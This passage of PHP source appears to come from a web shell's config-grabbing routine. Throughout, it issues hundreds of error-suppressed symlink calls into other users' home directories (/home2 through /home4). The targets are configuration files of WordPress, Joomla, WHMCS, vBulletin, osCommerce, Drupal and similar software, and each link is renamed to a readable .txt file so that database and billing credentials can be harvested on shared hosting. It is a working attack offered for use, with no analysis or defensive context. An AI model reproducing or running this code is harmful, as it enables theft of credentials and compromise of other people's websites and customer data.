  581. @symlink('/home2/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  582. @symlink('/home2/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  583. @symlink('/home2/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  584. @symlink('/home2/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  585. @symlink('/home2/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  586. @symlink('/home2/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  587. @symlink('/home2/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  588. @symlink('/home2/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  589. @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  590. @symlink('/home2/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  591. @symlink('/home2/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  592. @symlink('/home2/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  593. @symlink('/home2/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  594. @symlink('/home2/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  595. @symlink('/home2/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  596. @symlink('/home2/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  597. @symlink('/home2/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  598. @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  599. @symlink('/home2/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  600. @symlink('/home2/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  601. @symlink('/home2/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  602. @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  603. @symlink('/home2/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  604. @symlink('/home2/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  605. @symlink('/home2/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  606. @symlink('/home2/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  607. @symlink('/home2/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  608. @symlink('/home2/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  609. @symlink('/home2/' . $user . '/public_html/home2/wp-config.php', $user . '-wp-home2.txt');
  610. @symlink('/home2/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  611. @symlink('/home2/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  612. @symlink('/home2/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  613. @symlink('/home2/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  614. @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  615. @symlink('/home2/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  616. @symlink('/home2/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  617. @symlink('/home2/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  618. @symlink('/home2/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  619. @symlink('/home2/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  620. @symlink('/home2/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  621. @symlink('/home2/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  622. @symlink('/home2/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  623. @symlink('/home2/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  624. @symlink('/home2/' . $user . '/public_html/home2/configuration.php', $user . '-joomla-home2.txt');
  625. @symlink('/home2/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  626. @symlink('/home2/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  627. @symlink('/home2/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  628. @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  629. @symlink('/home2/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  630. @symlink('/home2/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  631. @symlink('/home2/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  632. @symlink('/home2/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  633. @symlink('/home2/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  634. @symlink('/home2/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  635. @symlink('/home2/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  636. @symlink('/home2/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  637. @symlink('/home2/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  638. @symlink('/home2/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  639. @symlink('/home2/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  640. @symlink('/home2/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  641. @symlink('/home2/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  642. @symlink('/home2/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  643. @symlink('/home2/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  644. @symlink('/home2/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  645. @symlink('/home2/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  646. @symlink('/home2/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  647. @symlink('/home2/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  648. @symlink('/home2/' . $user . '/public_html/config.php', $user . '-4images.txt');
  649. @symlink('/home2/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  650. @symlink('/home2/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  651. @symlink('/home2/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  652. @symlink('/home2/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  653. @symlink('/home2/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  654. @symlink('/home2/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  655. @symlink('/home2/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  656. @symlink('/home2/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  657. @symlink('/home2/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  658. @symlink('/home2/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  659. @symlink('/home2/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  660. @symlink('/home2/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  661. @symlink('/home2/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  662. @symlink('/home2/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  663. @symlink('/home2/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  664. @symlink('/home2/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  665. @symlink('/home2/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  666. @symlink('/home2/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  667. @symlink('/home2/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  668. @symlink('/home2/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  669. @symlink('/home2/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  670. @symlink('/home2/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  671. @symlink('/home2/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  672. @symlink('/home2/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  673. @symlink('/home2/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  674. @symlink('/home2/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  675. @symlink('/home2/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  676. @symlink('/home2/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  677. @symlink('/home2/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  678. @symlink('/home2/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  679. @symlink('/home2/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  680. @symlink('/home2/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  681. @symlink('/home2/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  682. @symlink('/home2/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  683. @symlink('/home2/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  684. @symlink('/home2/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  685. @symlink('/home2/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  686. @symlink('/home2/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  687. @symlink('/home2/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  688. @symlink('/home2/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  689. @symlink('/home2/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  690. @symlink('/home2/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  691. @symlink('/home2/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  692. @symlink('/home2/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  693. @symlink('/home2/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  694. @symlink('/home2/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  695. @symlink('/home2/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  696. @symlink('/home2/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  697. @symlink('/home2/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  698. @symlink('/home2/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  699. @symlink('/home2/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  700. @symlink('/home2/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  701. @symlink('/home2/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  702. @symlink('/home2/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  703. @symlink('/home3/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  704. @symlink('/home3/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  705. @symlink('/home3/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  706. @symlink('/home3/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  707. @symlink('/home3/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  708. @symlink('/home3/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  709. @symlink('/home3/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  710. @symlink('/home3/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  711. @symlink('/home3/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  712. @symlink('/home3/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  713. @symlink('/home3/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  714. @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  715. @symlink('/home3/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  716. @symlink('/home3/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  717. @symlink('/home3/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  718. @symlink('/home3/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  719. @symlink('/home3/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  720. @symlink('/home3/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  721. @symlink('/home3/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  722. @symlink('/home3/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  723. @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  724. @symlink('/home3/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  725. @symlink('/home3/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  726. @symlink('/home3/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  727. @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  728. @symlink('/home3/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  729. @symlink('/home3/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  730. @symlink('/home3/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  731. @symlink('/home3/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  732. @symlink('/home3/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  733. @symlink('/home3/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  734. @symlink('/home3/' . $user . '/public_html/home3/wp-config.php', $user . '-wp-home3.txt');
  735. @symlink('/home3/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  736. @symlink('/home3/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  737. @symlink('/home3/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  738. @symlink('/home3/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  739. @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  740. @symlink('/home3/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  741. @symlink('/home3/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  742. @symlink('/home3/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  743. @symlink('/home3/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  744. @symlink('/home3/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  745. @symlink('/home3/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  746. @symlink('/home3/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  747. @symlink('/home3/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  748. @symlink('/home3/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  749. @symlink('/home3/' . $user . '/public_html/home3/configuration.php', $user . '-joomla-home3.txt');
  750. @symlink('/home3/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  751. @symlink('/home3/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  752. @symlink('/home3/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  753. @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  754. @symlink('/home3/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  755. @symlink('/home3/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  756. @symlink('/home3/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  757. @symlink('/home3/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  758. @symlink('/home3/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  759. @symlink('/home3/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  760. @symlink('/home3/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
  761. @symlink('/home3/' . $user . '/public_html/Settings.php', $user . '-smf.txt');
  762. @symlink('/home3/' . $user . '/public_html/smf/Settings.php', $user . '-smf2.txt');
  763. @symlink('/home3/' . $user . '/public_html/forum/Settings.php', $user . '-smf-forum.txt');
  764. @symlink('/home3/' . $user . '/public_html/forums/Settings.php', $user . '-smf-forums.txt');
  765. @symlink('/home3/' . $user . '/public_html/upload/includes/config.php', $user . '-up.txt');
  766. @symlink('/home3/' . $user . '/public_html/article/config.php', $user . '-Nwahy.txt');
  767. @symlink('/home3/' . $user . '/public_html/up/includes/config.php', $user . '-up2.txt');
  768. @symlink('/home3/' . $user . '/public_html/conf_global.php', $user . '-6.txt');
  769. @symlink('/home3/' . $user . '/public_html/include/db.php', $user . '-7.txt');
  770. @symlink('/home3/' . $user . '/public_html/connect.php', $user . '-PHP-Fusion.txt');
  771. @symlink('/home3/' . $user . '/public_html/mk_conf.php', $user . '-9.txt');
  772. @symlink('/home3/' . $user . '/public_html/includes/config.php', $user . '-traidnt1.txt');
  773. @symlink('/home3/' . $user . '/public_html/config.php', $user . '-4images.txt');
  774. @symlink('/home3/' . $user . '/public_html/sites/default/settings.php', $user . '-Drupal.txt');
  775. @symlink('/home3/' . $user . '/public_html/member/configuration.php', $user . '-1member.txt');
  776. @symlink('/home3/' . $user . '/public_html/supports/includes/iso4217.php', $user . '-hostbills-supports.txt');
  777. @symlink('/home3/' . $user . '/public_html/client/includes/iso4217.php', $user . '-hostbills-client.txt');
  778. @symlink('/home3/' . $user . '/public_html/support/includes/iso4217.php', $user . '-hostbills-support.txt');
  779. @symlink('/home3/' . $user . '/public_html/billing/includes/iso4217.php', $user . '-hostbills-billing.txt');
  780. @symlink('/home3/' . $user . '/public_html/billings/includes/iso4217.php', $user . '-hostbills-billings.txt');
  781. @symlink('/home3/' . $user . '/public_html/host/includes/iso4217.php', $user . '-hostbills-host.txt');
  782. @symlink('/home3/' . $user . '/public_html/hosts/includes/iso4217.php', $user . '-hostbills-hosts.txt');
  783. @symlink('/home3/' . $user . '/public_html/hosting/includes/iso4217.php', $user . '-hostbills-hosting.txt');
  784. @symlink('/home3/' . $user . '/public_html/hostings/includes/iso4217.php', $user . '-hostbills-hostings.txt');
  785. @symlink('/home3/' . $user . '/public_html/includes/iso4217.php', $user . '-hostbills.txt');
  786. @symlink('/home3/' . $user . '/public_html/hostbills/includes/iso4217.php', $user . '-hostbills-hostbills.txt');
  787. @symlink('/home3/' . $user . '/public_html/hostbill/includes/iso4217.php', $user . '-hostbills-hostbill.txt');
  788. @symlink('/home3/' . $user . '/public_html/cart/configuration.php', $user . '-cart-WHMCS.txt');
  789. @symlink('/home3/' . $user . '/public_html/hosting/configuration.php', $user . '-hosting-WHMCS.txt');
  790. @symlink('/home3/' . $user . '/public_html/buy/configuration.php', $user . '-buy-WHMCS.txt');
  791. @symlink('/home3/' . $user . '/public_html/checkout/configuration.php', $user . '-checkout-WHMCS.txt');
  792. @symlink('/home3/' . $user . '/public_html/host/configuration.php', $user . '-host-WHMCS.txt');
  793. @symlink('/home3/' . $user . '/public_html/shop/configuration.php', $user . '-shop-WHMCS.txt');
  794. @symlink('/home3/' . $user . '/public_html/shopping/configuration.php', $user . '-shopping-WHMCS.txt');
  795. @symlink('/home3/' . $user . '/public_html/sale/configuration.php', $user . '-sale-WHMCS.txt');
  796. @symlink('/home3/' . $user . '/public_html/client/configuration.php', $user . '-client-WHMCS.txt');
  797. @symlink('/home3/' . $user . '/public_html/support/configuration.php', $user . '-support-WHMCS.txt');
  798. @symlink('/home3/' . $user . '/public_html/clientsupport/configuration.php', $user . '-clientsupport-WHMCS.txt');
  799. @symlink('/home3/' . $user . '/public_html/whm/whmcs/configuration.php', $user . '-whm-whmcs.txt');
  800. @symlink('/home3/' . $user . '/public_html/whm/WHMCS/configuration.php', $user . '-whm-WHMCS.txt');
  801. @symlink('/home3/' . $user . '/public_html/whmc/WHM/configuration.php', $user . '-whmc-WHM.txt');
  802. @symlink('/home3/' . $user . '/public_html/whmcs/configuration.php', $user . '-whmc-WHMCS.txt');
  803. @symlink('/home3/' . $user . '/public_html/supp/configuration.php', $user . '-supp-WHMCS.txt');
  804. @symlink('/home3/' . $user . '/public_html/secure/configuration.php', $user . '-sucure-WHMCS.txt');
  805. @symlink('/home3/' . $user . '/public_html/secure/whm/configuration.php', $user . '-sucure-whm-WHMCS.txt');
  806. @symlink('/home3/' . $user . '/public_html/secure/whmcs/configuration.php', $user . '-sucure-whmcs-WHMCS.txt');
  807. @symlink('/home3/' . $user . '/public_html/panel/configuration.php', $user . '-panel-WHMCS.txt');
  808. @symlink('/home3/' . $user . '/public_html/hosts/configuration.php', $user . '-hosts-WHMCS.txt');
  809. @symlink('/home3/' . $user . '/public_html/submitticket.php', $user . '-submitticket-WHMCS.txt');
  810. @symlink('/home3/' . $user . '/public_html/clients/configuration.php', $user . '-clients-WHMCS.txt');
  811. @symlink('/home3/' . $user . '/public_html/clientes/configuration.php', $user . '-clientes-WHMCS.txt');
  812. @symlink('/home3/' . $user . '/public_html/cliente/configuration.php', $user . '-client-WHMCS.txt');
  813. @symlink('/home3/' . $user . '/public_html/billing/configuration.php', $user . '-billing-WHMCS.txt');
  814. @symlink('/home3/' . $user . '/public_html/manage/configuration.php', $user . '-whm-manage-WHMCS.txt');
  815. @symlink('/home3/' . $user . '/public_html/my/configuration.php', $user . '-whm-my-WHMCS.txt');
  816. @symlink('/home3/' . $user . '/public_html/myshop/configuration.php', $user . '-whm-myshop-WHMCS.txt');
  817. @symlink('/home3/' . $user . '/public_html/billings/configuration.php', $user . '-billings-WHMCS.txt');
  818. @symlink('/home3/' . $user . '/public_html/supports/configuration.php', $user . '-supports-WHMCS.txt');
  819. @symlink('/home3/' . $user . '/public_html/auto/configuration.php', $user . '-auto-WHMCS.txt');
  820. @symlink('/home3/' . $user . '/public_html/go/configuration.php', $user . '-go-WHMCS.txt');
  821. @symlink('/home3/' . $user . '/public_html/' . $user . '/configuration.php', $user . '-USERNAME-WHMCS.txt');
  822. @symlink('/home3/' . $user . '/public_html/bill/configuration.php', $user . '-bill-WHMCS.txt');
  823. @symlink('/home3/' . $user . '/public_html/payment/configuration.php', $user . '-payment-WHMCS.txt');
  824. @symlink('/home3/' . $user . '/public_html/pay/configuration.php', $user . '-pay-WHMCS.txt');
  825. @symlink('/home3/' . $user . '/public_html/purchase/configuration.php', $user . '-purchase-WHMCS.txt');
  826. @symlink('/home3/' . $user . '/public_html/clientarea/configuration.php', $user . '-clientarea-WHMCS.txt');
  827. @symlink('/home3/' . $user . '/public_html/autobuy/configuration.php', $user . '-autobuy-WHMCS.txt');
  828. @symlink('/home4/' . $user . '/public_html/includes/configure.php', $user . '-shop.txt');
  829. @symlink('/home4/' . $user . '/public_html/os/includes/configure.php', $user . '-shop-os.txt');
  830. @symlink('/home4/' . $user . '/public_html/oscom/includes/configure.php', $user . '-oscom.txt');
  831. @symlink('/home4/' . $user . '/public_html/oscommerce/includes/configure.php', $user . '-oscommerce.txt');
  832. @symlink('/home4/' . $user . '/public_html/oscommerces/includes/configure.php', $user . '-oscommerces.txt');
  833. @symlink('/home4/' . $user . '/public_html/shop/includes/configure.php', $user . '-shop2.txt');
  834. @symlink('/home4/' . $user . '/public_html/shopping/includes/configure.php', $user . '-shop-shopping.txt');
  835. @symlink('/home4/' . $user . '/public_html/sale/includes/configure.php', $user . '-sale.txt');
  836. @symlink('/home4/' . $user . '/public_html/amember/config.inc.php', $user . '-amember.txt');
  837. @symlink('/home4/' . $user . '/public_html/config.inc.php', $user . '-amember2.txt');
  838. @symlink('/home4/' . $user . '/public_html/members/configuration.php', $user . '-members.txt');
  839. @symlink('/home4/' . $user . '/public_html/config.php', $user . '-4images1.txt');
  840. @symlink('/home4/' . $user . '/public_html/forum/includes/config.php', $user . '-forum.txt');
  841. @symlink('/home4/' . $user . '/public_html/forums/includes/config.php', $user . '-forums.txt');
  842. @symlink('/home4/' . $user . '/public_html/admin/conf.php', $user . '-5.txt');
  843. @symlink('/home4/' . $user . '/public_html/admin/config.php', $user . '-4.txt');
  844. @symlink('/home4/' . $user . '/public_html/wp-config.php', $user . '-wp13.txt');
  845. @symlink('/home4/' . $user . '/public_html/wp/wp-config.php', $user . '-wp13-wp.txt');
  846. @symlink('/home4/' . $user . '/public_html/WP/wp-config.php', $user . '-wp13-WP.txt');
  847. @symlink('/home4/' . $user . '/public_html/wp/beta/wp-config.php', $user . '-wp13-wp-beta.txt');
  848. @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp13-beta.txt');
  849. @symlink('/home4/' . $user . '/public_html/press/wp-config.php', $user . '-wp13-press.txt');
  850. @symlink('/home4/' . $user . '/public_html/wordpress/wp-config.php', $user . '-wp13-wordpress.txt');
  851. @symlink('/home4/' . $user . '/public_html/Wordpress/wp-config.php', $user . '-wp13-Wordpress.txt');
  852. @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp13-Wordpress.txt');
  853. @symlink('/home4/' . $user . '/public_html/wordpress/beta/wp-config.php', $user . '-wp13-wordpress-beta.txt');
  854. @symlink('/home4/' . $user . '/public_html/news/wp-config.php', $user . '-wp13-news.txt');
  855. @symlink('/home4/' . $user . '/public_html/new/wp-config.php', $user . '-wp13-new.txt');
  856. @symlink('/home4/' . $user . '/public_html/blog/wp-config.php', $user . '-wp-blog.txt');
  857. @symlink('/home4/' . $user . '/public_html/beta/wp-config.php', $user . '-wp-beta.txt');
  858. @symlink('/home4/' . $user . '/public_html/blogs/wp-config.php', $user . '-wp-blogs.txt');
  859. @symlink('/home4/' . $user . '/public_html/home4/wp-config.php', $user . '-wp-home4.txt');
  860. @symlink('/home4/' . $user . '/public_html/protal/wp-config.php', $user . '-wp-protal.txt');
  861. @symlink('/home4/' . $user . '/public_html/site/wp-config.php', $user . '-wp-site.txt');
  862. @symlink('/home4/' . $user . '/public_html/main/wp-config.php', $user . '-wp-main.txt');
  863. @symlink('/home4/' . $user . '/public_html/test/wp-config.php', $user . '-wp-test.txt');
  864. @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  865. @symlink('/home4/' . $user . '/public_html/arcade/functions/dbclass.php', $user . '-ibproarcade.txt');
  866. @symlink('/home4/' . $user . '/public_html/joomla/configuration.php', $user . '-joomla2.txt');
  867. @symlink('/home4/' . $user . '/public_html/protal/configuration.php', $user . '-joomla-protal.txt');
  868. @symlink('/home4/' . $user . '/public_html/joo/configuration.php', $user . '-joo.txt');
  869. @symlink('/home4/' . $user . '/public_html/cms/configuration.php', $user . '-joomla-cms.txt');
  870. @symlink('/home4/' . $user . '/public_html/site/configuration.php', $user . '-joomla-site.txt');
  871. @symlink('/home4/' . $user . '/public_html/main/configuration.php', $user . '-joomla-main.txt');
  872. @symlink('/home4/' . $user . '/public_html/news/configuration.php', $user . '-joomla-news.txt');
  873. @symlink('/home4/' . $user . '/public_html/new/configuration.php', $user . '-joomla-new.txt');
  874. @symlink('/home4/' . $user . '/public_html/home4/configuration.php', $user . '-joomla-home4.txt');
  875. @symlink('/home4/' . $user . '/public_html/vb/includes/config.php', $user . '-vb-config.txt');
  876. @symlink('/home4/' . $user . '/public_html/vb3/includes/config.php', $user . '-vb3-config.txt');
  877. @symlink('/home4/' . $user . '/public_html/cc/includes/config.php', $user . '-vb1-config.txt');
  878. @symlink('/home4/' . $user . '/public_html/includes/config.php', $user . '-includes-vb.txt');
  879. @symlink('/home4/' . $user . '/public_html/forum/includes/class_core.php', $user . '-vbluttin-class_core.php.txt');
  880. @symlink('/home4/' . $user . '/public_html/vb/includes/class_core.php', $user . '-vbluttin-class_core.php1.txt');
  881. @symlink('/home4/' . $user . '/public_html/cc/includes/class_core.php', $user . '-vbluttin-class_core.php2.txt');
  882. @symlink('/home4/' . $user . '/public_html/configuration.php', $user . '-joomla.txt');
  883. @symlink('/home4/' . $user . '/public_html/includes/dist-configure.php', $user . '-zencart.txt');
  884. @symlink('/home4/' . $user . '/public_html/zencart/includes/dist-configure.php', $user . '-shop-zencart.txt');
  885. @symlink('/home4/' . $user . '/public_html/shop/includes/dist-configure.php', $user . '-shop-ZCshop.txt');
